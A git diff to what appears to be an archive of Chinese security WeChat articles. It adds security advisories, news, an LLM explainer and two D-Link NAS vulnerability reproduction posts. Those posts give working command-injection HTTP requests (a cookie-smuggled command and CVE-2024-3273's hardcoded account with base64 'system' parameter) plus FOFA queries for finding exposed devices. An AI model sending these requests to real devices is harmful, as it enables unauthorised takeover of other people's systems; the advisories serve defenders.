diff --git a/data.json b/data.json index 9fd6e709..6eedeea2 100644 --- a/data.json +++ b/data.json @@ -206,5 +206,19 @@ "https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=2&sn=44f939a81178afad27dca90a02dfbfc6": "【漏洞通告】Apache OFBiz远程代码执行漏洞(CVE-2024-47208)", "https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217": "上周关注度较高的产品安全漏洞(20241111-20241117)", "https://mp.weixin.qq.com/s?__biz=MzUzOTE2OTM5Mg==&mid=2247490175&idx=1&sn=8a88f13080b38ee937638a6ab1a1a319": "【风险通告】Palo Alto Networks PAN-OS存在身份验证绕过漏洞(CVE-2024-0012)", - "https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247507416&idx=1&sn=6eb8217321fbe1a5361675058bc55882": "已知漏洞!宝兰德最新漏洞绕过补丁黑名单,速修" + "https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247507416&idx=1&sn=6eb8217321fbe1a5361675058bc55882": "已知漏洞!宝兰德最新漏洞绕过补丁黑名单,速修", + "https://mp.weixin.qq.com/s?__biz=MzU3NzY3MzYzMw==&mid=2247498607&idx=2&sn=2e4002dc2db4869990ee4fa3d38f1f43": "渗透测试 -- 漏洞百解", + "https://mp.weixin.qq.com/s?__biz=MzI5NTM4OTQ5Mg==&mid=2247632338&idx=3&sn=287c0b4f0cfbdbc1d11e7f8b67787249": "美国饮用水系统存在300多个漏洞,影响1.1亿人", + "https://mp.weixin.qq.com/s?__biz=MzUzMDUxNTE1Mw==&mid=2247508728&idx=1&sn=50e200ae59cd278b496fa675d916a377": "微软2024年11月补丁日重点漏洞安全预警", + "https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489184&idx=1&sn=04ec9cf838fb1a5cf5cc4c8c93a8bf30": "【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露", + "https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489184&idx=2&sn=6674f470ab506ed8239b4103f4d11218": "【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞", + "https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489184&idx=3&sn=22ce05bbdff66ec1bf477e37c429c327": "【漏洞预警】Apache Tomcat资源控制不当漏洞", + "https://mp.weixin.qq.com/s?__biz=Mzg4NzgyODEzNQ==&mid=2247488403&idx=3&sn=9914510e560c5eec5ad6282278ab6577": "「人脑替代计划-6」LLM是什么?", + "https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247517233&idx=1&sn=af475bf0f3de0493fd24dcdc37463e5a": "漏洞挖掘|电子商城类漏洞挖掘案例灵感复现", + "https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486072&idx=1&sn=7558c8a2becda935fa6b7237363f864e": "「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞", + "https://mp.weixin.qq.com/s?__biz=Mzg2Mjc3NTMxOA==&mid=2247515356&idx=1&sn=202c8573e3a77824edf45e865b30e051": "漏洞预警|Apache OFBiz远程代码执行漏洞(CVE-2024-47208)", + "https://mp.weixin.qq.com/s?__biz=Mzg2Mjc3NTMxOA==&mid=2247515356&idx=2&sn=d677b50ea4f958d207cd6a3c772fe0b8": "漏洞预警|Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞", + "https://mp.weixin.qq.com/s?__biz=MzIwMzI1MDg2Mg==&mid=2649945063&idx=1&sn=e933d8e9d2243641c8f007c652caad48": "YAK 亮相2024年世界互联网大会!携手中国联通共塑网络安全新生态", + "https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307419&idx=3&sn=9f3e2546a68551118a2b2bc765b70ab3": "关键的WordPress插件漏洞导致超400万网站暴露", + "https://mp.weixin.qq.com/s?__biz=MzkyMjcxNzE2MQ==&mid=2247484334&idx=1&sn=bfd4f94e969ee9f8e7ec653c0feae32a": "【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)" } \ No newline at end of file diff --git a/doc/YAK 亮相2024年世界互联网大会!携手中国联通共塑网络安全新生态.md b/doc/YAK 亮相2024年世界互联网大会!携手中国联通共塑网络安全新生态.md new file mode 100644 index 00000000..db335ccc --- /dev/null +++ b/doc/YAK 亮相2024年世界互联网大会!携手中国联通共塑网络安全新生态.md @@ -0,0 +1,19 @@ +# YAK 亮相2024年世界互联网大会!携手中国联通共塑网络安全新生态 +MegaVector 万径安全 2024-11-19 12:03 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/qdI65GS20NQQicuyMeMLu91BicIfGa3MicPLg2dic9GvNoVerFfMh2Vib8hicVFsuI4Cq4MtlTMj0QickZefFU1Ria00WQ/640?wx_fmt=gif&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/qdI65GS20NRDMpsH80cZLM0NAhA3e6YngfTtFqEicLpwKzHjMWTYyicB7lxGZXfpVveH5rLpShgyfdicyKalOicP6w/640?wx_fmt=jpeg&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/MVPvEL7Qg0FhwyFd6snAVxesxNeE1t3B9iaUao0eP0VV4u7bNnLEEr1micZb2lPyCnHWKkRgcBbu0t8dEULLQUvA/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**关于万径安全** + +万径安全是网络安全行业知名的专精特新企业,致力于为用户提供全面、高效、安全的网络安全解决方案。 +公司以 “AI+YAK” 为企业核心战略,专注于网络安全基础设施和智能化技术研究,打造了首款国产安全语言 Yaklang 和网络安全专用 AI大模型万径千机(ChatCS)两大核心,并基于 YAK 构建自主可控的网络安全生态体系,推动安全产业融合发展,产品已广泛应用于能源、金融、运营商等多个行业 +。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/qdI65GS20NTIgD8ibRvLqV8PEQwkTFQfej43Rlxl7gZa4ZDlImM0TGFbQgnyKFyY3bVIxaHRuTtr962uxQ8PznA/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + diff --git a/doc/「人脑替代计划-6」LLM是什么?.md b/doc/「人脑替代计划-6」LLM是什么?.md new file mode 100644 index 00000000..ac2b76d0 --- /dev/null +++ b/doc/「人脑替代计划-6」LLM是什么?.md @@ -0,0 +1,153 @@ +# 「人脑替代计划-6」LLM是什么? +原创 破天KK KK安全说 2024-11-19 13:37 + +# 大型语言模型在生成人工智能中的应用如何? + +我们以ChatGPT为例来直观地理解一下。ChatGPT 的众多功能中,其中之一就是理解人类语言(用简单的话提出问题)。它还可以产生我们人类可以理解的反应。ChatGPT 与人类交流的这种能力是由大型语言模型提供支持的。 + +换句话说,我们可以说—— +一个需要生成类似人类文本的生成式人工智能系统需要大型语言模型。 + +我们再通俗一点来分解一下吧! +# 什么是语言模型? + +我们先来了解一下什么是语言模型。 + +语言模型是: +- 一种机器学习模型 + +- 它使用各种统计和概率技术 + +- 预测句子或短语中给定单词序列的概率。 + +简而言之,语言模型旨在根据给定句子/短语的上下文预测下一个最合适的单词来填充句子或短语中的空白。 + + +我们举个例子来更好地理解! + +当我们在手机中使用消息传递应用程序时,它可以通过在我们输入消息时预测下一个单词来帮助我们。例如,一旦我们输入“how”, +手机可能会建议“are”或“is” +之类的单词,因为它知道这些单词通常出现在句子中的“how”之后。 + +同样,如果我们输入“我要去”, +手机可能会预测“商店”、“公园”、“办公室” +或“海滩” +等单词,因为这些是日常语言中“去”之后的常见单词。 + +该预测是根据我们迄今为止输入的内容以及通过分析大量文本学到的模式做出的。 +# 大语言模型(LLM) + +大语言模型 (LLM) 是一种以下语言模型: +- 一种机器学习模型 + +- 在大型文本数据集上进行训练 + +- 并使用先进的神经网络架构 + +- 生成或预测类似人类的文本。 + +回到我们之前的例子,语言模型可以帮助人工智能工具预测句子中即将出现的单词。 + +下图总结了有关大型语言模型的要点。 + + +大型语言模型最独特和最强大的一点是它们 +能够根据大量数据生成类似人类的文本、总结和预测内容。 +法学硕士可以处理和分析大量文本数据,使他们能够高度熟练地完成文本生成、摘要、翻译和情感分析等语言处理任务。 +# 自然语言处理(NLP) + +自然语言处理是一个与法学硕士密切相关的重要概念。 + +自然语言处理(NLP)是人工智能的一个子集,它专注于计算机和人类通过自然语言(例如英语)进行交互。 +- NLP是指使计算机能够理解人类语言并用同一种语言与我们交流的过程。 + +- NLP 使用算法来分析、理解和生成人类语言。 + +- 它还可以帮助计算机理解单词和句子背后的上下文和情感。 + +我们再举一个例子来更好地理解NLP。虚拟助手,例如 Siri,可以使用 NLP 理解并响应我们的命令。 + +想象一下你问 Siri:“设置明天早上 7 点的闹钟。” +- Siri 的 NLP 算法分析句子,将其分解为单个单词并理解它们的含义、语法和上下文。 + +- NLP算法将能够理解用户的意图,即设置闹钟。 + +- 此外,Siri 还会执行命令中指定的操作,在您的设备上设置第二天早上 7 点的闹钟。 + +- 最后,Siri 会用您的语言给出回复。 + +自然语言处理是人类响应(例如 ChatGPT)、语言翻译、搜索引擎等任务的支柱。 +# 自然语言处理 (NLP) 和大语言模型 (LLM) + +大型语言模型可以被视为自然语言处理模型的演变。 +换句话说,我们可以说大型语言模型是为 NLP 任务设计的任何模型,重点是理解和生成类似人类的文本。 + +虽然 NLP 包含广泛的用于处理人类语言的模型和技术,但法学硕士专注于理解和生成类人文本。LLM 专门设计用于根据单词或句子之前的单词来预测该单词或句子的概率,从而使它们能够生成连贯且上下文相关的文本。 + +从机器学习技术的角度来看,自然语言处理使用了广泛的技术,从基于规则的方法到机器学习和深度学习方法。 + +另一方面,大型语言模型主要使用深度学习技术来理解文本数据中的模式和上下文,以预测序列中下一个单词的概率。法学硕士是基于人工神经网络架构设计的。 +大多数大型语言模型都是基于基于转换器的模型。 +# 大语言模型与生成式人工智能有何关系? + +大型语言模型 (LLM) 是 +生成式 AI 的一个子集 +。虽然生成式人工智能可以生成多种类型的内容,例如文本、图像、视频、代码、音乐等,但法学硕士仅专注于生成文本。 +# 在哪里/使用多大的语言模型? + +大型语言模型 (LLM) 用于不同行业的各种人工智能应用程序。以下是一些主要示例: + +虚拟助理 + +LLM 模型是为 Siri、Alexa 或 Google Assistant 等虚拟助手提供支持的引擎。LLM 模型分析人类命令并解释其含义,帮助这些虚拟助手代表用户执行多项操作。 + +聊天机器人 + +ChatGPT 不再是一个新词了。我们大多数人都使用过它或类似的人工智能对话聊天机器人。这些聊天机器人使用大型语言模型以模仿人类语言的方式理解人类问题和响应。 + +语言翻译 + +大型语言模型在谷歌翻译等人工智能工具完成的语言翻译中发挥着重要作用。这些模型经过大量多语言文本数据的训练,这使它们能够捕捉不同语言的细微差别、变化、上下文和复杂性。 + +当我们要求翻译工具翻译句子时,它使用 LLM 算法来分析一种语言的输入文本,并以目标语言生成准确且适合上下文的翻译。 + +通过双向考虑两种语言中单词和短语之间的关系,法学硕士可以生成保留原文含义和语气的翻译。 + +文本生成 + +如今,大型语言模型在许多应用程序中用于生成类似人类的文本。这些模型非常复杂,可以根据给定的提示或输入生成连贯且上下文相关的文本。LLM 模型可用于撰写故事、生成产品描述、撰写电子邮件等等。 + +总结 + +大型语言模型对于进行文档摘要非常有用。利用自然语言处理能力,LLM模型可以将冗长的文档或文章总结为简洁的摘要,同时保留关键信息和要点。使用注意力机制和上下文理解等技术,法学硕士可以确定摘要中包含的最显着的信息,确保其抓住原文的本质。 + +情感分析 + +情感分析是确定文本中表达的情感或情绪基调的过程。大型语言模型可用于分析大量文本数据,理解语言的上下文、细微差别和语气,并识别情绪极性(积极、消极或中性)。 + +如今,许多组织使用大型语言模型来识别来自社交媒体帖子、产品评论、客户反馈、新闻文章等的文本数据中的情绪。 + +内容推荐 + +Netflix、YouTube、Amazon 等平台越来越多地使用大型语言模型 (LLM) 进行内容推荐,为用户提供更加个性化和相关的建议。这些模型捕获单词、短语和主题之间的关系,使他们能够理解内容的含义和上下文。在内容推荐方面,法学硕士会分析用户与内容的交互,例如他们阅读过的文章、购买过的产品或观看过的视频。根据这些数据,法学硕士可以预测用户可能感兴趣的其他内容并建议相关选项。 +# 大型语言模型的一些流行示例 + +以下是一些使用大型语言模型的流行应用程序。 +# GPT(生成式预训练变压器) + +生成式预训练 Transformer 可能是最流行的大型语言模型,在 ChatGPT 中使用。在 2017 年引入 Transformer 架构后,OpenAI 在 2018 年发布了 GPT-1,作为他们第一个基于 Transformer 的大型语言模型。GPT-1 最初在 BookCorpus 上进行训练,该数据集包含 7000 多本自行出版的书籍。 + +随后,OpenAI 发布了更高级的 GPT 版本:GPT-2、GPT-3、GPT-3.5 和 GPT-4。所有这些都是基于 Transformer 的大语言模型。GPT-4 是一种多模式模型,这意味着它可以将图像和文本作为输入。 +# BERT(来自 Transformers 的双向编码器表示) + +BERT 由 Google 于 2018 年推出,是一种基于 Transformer 的大型语言模型。BERT 代表了大语言模型和自然语言处理领域的重大进步。它是一种双向 Transformer 模型,可以并行处理单词,与循环神经网络 (RNN) 等传统顺序模型相比,效率更高。 +# LaMDA(对话应用语言模型) + +LaMDA是会话式大语言模型,由Google开发,也是一个基于Transformer的模型。ChatGPT 突然崛起后,谷歌宣布推出自己的对话式 AI 聊天机器人“Bard”。巴德由 LaMDA 提供支持。 + +后来,Google推出了PaLM(Pathways Language Model),作为LaMDA的继承者。此外,2024 年,谷歌将 Bard 重新命名为新名称“Gemini”。Gemini 由同名的大语言模型 (LLM) 提供支持。Gemini 多模态大语言模型是 LaMDA 和 PaLM 的继承者。 +# LLaMA(大型语言模型元人工智能) + +LLaMA(Large Language Model Meta AI)是 Meta AI 推出的一组大型语言模型(LLM)。LLaMA 是一种自回归语言模型,建立在 Transformer 架构之上。 + + diff --git a/doc/「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞.md b/doc/「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞.md new file mode 100644 index 00000000..19e84485 --- /dev/null +++ b/doc/「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞.md @@ -0,0 +1,122 @@ +# 「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞 +冷漠安全 冷漠安全 2024-11-19 13:01 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0pFeDPJNnYaE7pYibBLQrUbLZwqelcotCqhYf0seBKfHroSUm8XuHyka5I3SmicWcJYUpZbFmxJCZ1Q/640?wx_fmt=gif&from=appmsg "") + +**0x01 免责声明** + +**免责声明** + +请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!! + +0x02 + +**产品介绍** + +D-Link NAS设备是一种基于网络的存储解决方案,作为网络存储设备,旨在为企业提供大容量的存储空间,并通过网络连接实现数据的访问和管理。这种设备不仅满足了企业对数据存储的需求,还提供了高效的数据共享和访问功能,提升了企业数据管理的效率和灵活性。广泛应用于各种企业场景,如文档存储、图片和视频存储、数据库备份等。特别是在需要高效数据共享和访问的企业环境中,如设计工作室、广告公司、医疗机构等,D-Link NAS设备更是发挥了其强大的功能和优势。 + +0x03 + +**漏洞威胁** + +D-Link NAS设备 /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。 + +0x04 + +**漏洞环境** + +FOFA: +``` +body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info" +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRFmEVfFzhXHCf9ELphCHVQ3Hia7VKyBNjlw322jNCxamRB1kAWXXkLdicQ/640?wx_fmt=png&from=appmsg "") + + +0x05 + +**漏洞复现** + +PoC +``` +GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +Cookie: username=mopfdfsewo'& id & echo 'mopfdfsewo; +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRF35gWgFzWQZJ3VgGPewmmDDYDL46ksQpOvQ9ibLj1v6QoBVBmVLKJPIA/640?wx_fmt=png&from=appmsg "") + + +0x06 + +**批量脚本验证** + +Nuclei验证脚本已发布 +知识星球:冷漠安全 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRFJTQY0kckZBZ3x4iagPc1Fsu39Ek3gldlVfMic3KdApsohvxBu5GnczAg/640?wx_fmt=png&from=appmsg "") + + +0x07 + +**修复建议** + +应用补丁和更新: 用户应下载并安装 D-Link 提供的任何固件更新。 + +限制网络访问: 作为临时措施,对 NAS 管理界面的网络访问应仅限于受信任的 IP 地址。 + +监控固件更新: 受影响的设备用户应密切关注 D-Link 即将提供的任何安全补丁。 + +0x08 + +**加入我们** + +漏洞详情及批量检测POC工具请前往知识星球获取 + +知识星球:冷漠安全交个朋友,限时优惠券:加入立减25星球福利:每天更新最新漏洞POC、资料文献、内部工具等 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRF8oHYFian8HYKOxD5G4XaE4AyMtyjQG5a8P2mvsLwGaaUud4919fFS0w/640?wx_fmt=png&from=appmsg "") + + +「星球介绍」: + +本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。 + +本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。 + +本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。 + + +「星球服务」: + + +加入星球,你会获得: + + +♦ 批量验证漏洞POC脚本 + + +♦ 0day、1day分享 + + +♦ 汇集其它付费星球资源分享 + + +♦ 大量的红蓝对抗实战资源 + + +♦ 优秀的内部红蓝工具及插件 + + +♦ 综合类别优秀Wiki文库及漏洞库 + + +♦ 提问及技术交流 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRFr7DSEvkicFibVdQpy85tjhFeVHsLL0lDkmBo9mDEdX50ObYFoDPrlXiag/640?wx_fmt=gif&from=appmsg "") + + diff --git a/doc/【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273).md b/doc/【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273).md new file mode 100644 index 00000000..25de18c6 --- /dev/null +++ b/doc/【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273).md @@ -0,0 +1,46 @@ +# 【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273) +原创 清风 白帽攻防 2024-11-19 09:52 + +## 免责声明:请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 +简介 + +D-Link NAS(网络附加存储)是通过网络连接的存储设备,允许多个设备共享和存储数据。作为一家知名的网络设备品牌,D-Link 提供多种 NAS 解决方案,广泛应用于家庭和企业环境中。 + +![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dakQkvYTcT4pr9bd9LAZXfXfds3MLKp08Xnf2cpkQ3icXT4wlXTbNZAr9AiaftKI5f2pZshDcPUMAw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +漏洞描述 + +通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及“system”参数的命令注入问题,攻击者可在设备上远程执行命令。命令注入漏洞通过 HTTP GET 请求将 Base64 编码的命令添加到“system”参数中从而被执行。 +影响版本``` +DNS-320L +DNS-325 +DNS-327L +DNS-340L +``` +fofa语法``` +fid="hWN+yVVhLzKJaLkd/ITHpA==" +``` +漏洞复现``` +GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHdk HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1Priority: u=0, i +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dsnxBzMsDoZLEIJ5Ricybib7SFknZCecWDuRrGSibbN3jTJCQ4oN3ib3InyYksm6wpty7eibvbdwziaiaibg/640?wx_fmt=png&from=appmsg "") + +批量检测(批量检测POC工具请在公众号知识星球获取): + +![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dsnxBzMsDoZLEIJ5Ricybib762CzKibvlGhDf9uMNv7NxyZpPPbIZtOyR06sfxwBBt5JtJVhWbL7dUQ/640?wx_fmt=png&from=appmsg "") +修复建议 + + + + +1、关闭互联网暴露面或接口 + +2、及时更新补丁或升级至安全版本 + + + + +网安交流群 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/yu6trpdUX0efFOzibVic3qjn100tFgpUIh7ib8g9cKajewKFM5kXP350q21SCLvlgO6yx1tlia8VYxI4j3cv57FqFg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + diff --git a/doc/【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露.md b/doc/【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露.md new file mode 100644 index 00000000..5d93d40f --- /dev/null +++ b/doc/【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露.md @@ -0,0 +1,7 @@ +# 【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露 +cexlife 飓风网络安全 2024-11-19 13:50 + +![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu019dc8yxarexIEx97oF3hOtlTibx7hfaz4tCFJPXcoJxUDS1GYa7gG4Hxh5VyaHSqeHFKmNZ8PnpGQ/640?wx_fmt=png&from=appmsg "") + +**漏洞描述:**Kafka官方发布安全公告,修复了Apache Kafka Clients中存在的一处权限管理不当漏洞,可导致文件和目录可被外部访问。该漏洞是由于Apache Kafka Clients的配置可能被不可信方指定,攻击者可利用ConfigProvider插件读取磁盘内容和环境变量,官方已针对此漏洞发布3.8.0版本,建议受影响用户升级 kafka-clients到3.8.0及以上版本以缓解此漏洞。**修复建议:正式防护方案:**针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:Apache Kafka Clients >= 3.8.0**下载链接:**https://kafka.apache.org/downloads安装前,请确保备份所有关键数据,并按照官方指南进行操作。安装后,进行全面测试以验证漏洞已被彻底修复,并确保系统其他功能正常运行。**参考链接:**https://lists.apache.org/thread/9whdzfr0zwdhr364604w5ssnzmg4v2lv + diff --git a/doc/【漏洞预警】Apache Tomcat资源控制不当漏洞.md b/doc/【漏洞预警】Apache Tomcat资源控制不当漏洞.md new file mode 100644 index 00000000..751ec682 --- /dev/null +++ b/doc/【漏洞预警】Apache Tomcat资源控制不当漏洞.md @@ -0,0 +1,11 @@ +# 【漏洞预警】Apache Tomcat资源控制不当漏洞 +cexlife 飓风网络安全 2024-11-19 13:50 + +![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu019dc8yxarexIEx97oF3hOtXLFQBJs0iaF1c3JyughvqDwoia4TpMryRWGXQd5gpKLoXY3bQ6g73eHg/640?wx_fmt=png&from=appmsg "") + +**漏洞描述:**Apache Tocmat发布安全公告,其中公开了一个Apache Tomcat资源控制不当漏洞,由于对HTTP/2使用的请求和响应的错误回收,可能导致用户之间的请求和/或响应发生混淆,造成数据泄露。**修复建议:正式防护方案:**厂商已发布补丁修复漏洞,建议下载相关补丁或联系厂商获取相关支持尽快更新至安全版本。**安全版本:**Apache tomcat >= 9.0.96Apache tomcat >= 10.1.31Apache tomcat >= 11.0.0 + +与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。 + +**参考链接:**https://lists.apache.org/thread/ty376mrxy1mmxtw3ogo53nc9l3co3dfs + diff --git a/doc/【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞.md b/doc/【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞.md new file mode 100644 index 00000000..7976c812 --- /dev/null +++ b/doc/【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞.md @@ -0,0 +1,9 @@ +# 【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞 +cexlife 飓风网络安全 2024-11-19 13:50 + +![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu019dc8yxarexIEx97oF3hOtVbChSjONCc2qoicWwDX4RzpPaFz0u5e78IibprGAdn9lrHAciarEzYWkQ/640?wx_fmt=png&from=appmsg "") + +**漏洞描述:** + +Palo Alto Networks发布安全公告,披露了PAN--OS软件Web管理界面中存在认证绕过漏洞,未经身份验证的攻击者如果能够访问管理Web界面,就可能获得PAN-OS管理员权限,从而执行管理操作、篡改配置,结合利用其他需认证的漏洞可实现系统的完全控制,若按照推荐的最佳实践部署指南,将管理Web界面的访问限制为仅受信任的内部IP地址,可大大降低此风险,官方已提供此漏洞的修复版本,建议受影响用户及时升级到安全版本。**修复建议:正式防护方案:**针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:**Additional PAN-OS 11.2修复版本:**11.2.0-h111.2.1-h111.2.2-h211.2.3-h311.2.4-h1**Additional PAN-OS 11.1修复版本:**11.1.0-h411.1.1-h211.1.2-h1511.1.3-h1111.1.4-h711.1.5-h1**Additional PAN-OS 11.0 修复版本:**11.0.0-h411.0.1-h511.0.2-h511.0.3-h1311.0.4-h611.0.5-h211.0.6-h1**Additional PAN-OS 10.2 修复版本:**10.2.0-h410.2.1-h310.2.2-h610.2.3-h1410.2.4-h3210.2.5-h910.2.6-h610.2.7-h1810.2.8-h1510.2.9-h1610.2.10-h910.2.11-h610.2.12-h2安装前,请确保备份所有关键数据,并按照官方指南进行操作。安装后,进行全面测试以验证漏洞已被彻底修复,并确保系统其他功能正常运行。 + diff --git a/doc/关键的WordPress插件漏洞导致超400万网站暴露.md b/doc/关键的WordPress插件漏洞导致超400万网站暴露.md new file mode 100644 index 00000000..ec8e1b04 --- /dev/null +++ b/doc/关键的WordPress插件漏洞导致超400万网站暴露.md @@ -0,0 +1,84 @@ +# 关键的WordPress插件漏洞导致超400万网站暴露 +bug胤 FreeBuf 2024-11-19 11:35 + +![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") + + +据Wordfence安全研究员István Márton披露,一个关键的认证绕过了漏洞被暴露在了WordPress的Really Simple Security(以前称为Really Simple SSL)插件中,如果此漏洞被利用,攻击者可以远程获得易受攻击网站的完全管理权限。 + + +这个漏洞被追踪为CVE-2024-10924(CVSS评分:9.8),影响插件的免费和付费版本。该软件安装在超过400万个WordPress网站上。这个漏洞是可以脚本化的,意味着它可以被转换成大规模的自动化攻击针对WordPress网站。 + + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBSkNWtqpz4GykYkgUZosXLbOZSBaz720OESmAoeZZOUKGNTCMopP8kA/640?wx_fmt=png&from=appmsg "") + + +这个漏洞在2024年11月6日披露,在一周后发布的9.1.2版本中已被修补。 +可能是有被滥用的风险促使插件维护者与WordPress合作,在公开披露之前强制更新了所有运行此插件的网站。 + + +根据Wordfence的说法,这个认证绕过漏洞存在于9.0.0至9.1.1.1版本中,起因是在一个名为“check_login_and_get_user”的函数中不正确的用户检查错误处理,添加双因素认证的一个特性做得不够安全,使得未经认证的攻击者可以在双因素认证启用时,通过一个简单的请求获得对任何用户账户的访问权限,包括管理员账户。 + + +成功利用这个漏洞可能会有严重的后果,因为它可能允许恶意行为者劫持WordPress网站,并进一步将它们用于犯罪目的。 + + +这一信息是Wordfence在透露了WPLMS学习管理系统(WordPress LMS,CVE-2024-10470,CVSS评分:9.8)中的另一个关键缺陷几天后发布的,该缺陷可能允许未经认证的威胁者读取和删除任意文件。 + + +具体来说,4.963之前的版本由于文件路径验证和权限检查不足,这使得未经认证的攻击者能够读取和删除服务器上的任何任意文件,包括网站的wp-config.php文件。删除wp-config.php文件会使网站进入设置状态,允许攻击者通过将其连接到他们控制的数据库来发起对网站的接管。 + + +【 +FreeBuf粉丝交流群招新啦! + +在这里,拓宽网安边界 + +甲方安全建设干货; + +乙方最新技术理念; + +全球最新的网络安全资讯; + +群内不定期开启各种抽奖活动; + +FreeBuf盲盒、大象公仔...... + +扫码添加小蜜蜂微信回复「加群」,申请加入群聊 +】 + 